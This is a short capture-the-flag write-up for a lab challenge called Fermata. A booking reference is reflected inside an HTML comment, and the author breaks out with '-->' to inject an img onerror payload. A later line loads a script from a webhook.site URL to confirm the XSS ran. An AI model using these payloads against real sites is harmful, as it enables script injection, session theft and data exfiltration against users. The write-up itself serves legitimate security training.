Webverselabs Challenge Fermata Reflected XSS
Scenario :
Fermata connects clients with piano tuners. An old debug line left over from development drops the booking reference into an HTML comment so ops can scan View Source for bad IDs. It never occurred to anyone that comments are just text — not a fence.
Solution :
First let’s enumerate the application normally .
First endpoint we find is the /tuners endpoint which doesn’t return anything useful .
Posts as well doesn’t have anything of use to us :
Now let’s try to book a session , i will send the request then modify it with Burp .
I tried multiple XSS payloads , but all of themlead to this redirection :
I even tried to get a call back to my WebHook Url but i got nothing .
let’s follow the redirection , which is a GET request made to /book?ref=FM-2026….
Now i tried some XSS payloads , used XSStrike but couldnt get the payload to execute , whatever we input in the parameter field gets rendered back to us as a comment .
If we read the source code , we see that whatever we type gets added to an HTML comment .
Let’s try to break out of the HTML comment before we execute our payload to see if it works .
1
2
3
4
5
6
7
<!-- debug:booking-ref <img src=x onerror=alert(1)> --> : Now if we add --> , it should break out of the HTML comment .
<!-- debug:booking-ref--> <img src=x onerror=alert(1)> -->
==> Now let's try to get a callback to our Webhook url .
--> <script src=https://webhook.site/26940115-08b9-440e-8ac8-3bbaaa7a></script>
Now if we check out WebHook Site , we see that we get our Callback which means the payload was executed .
Once we get our XSS to work we should automatically get the flag .
That’s it for this challenge .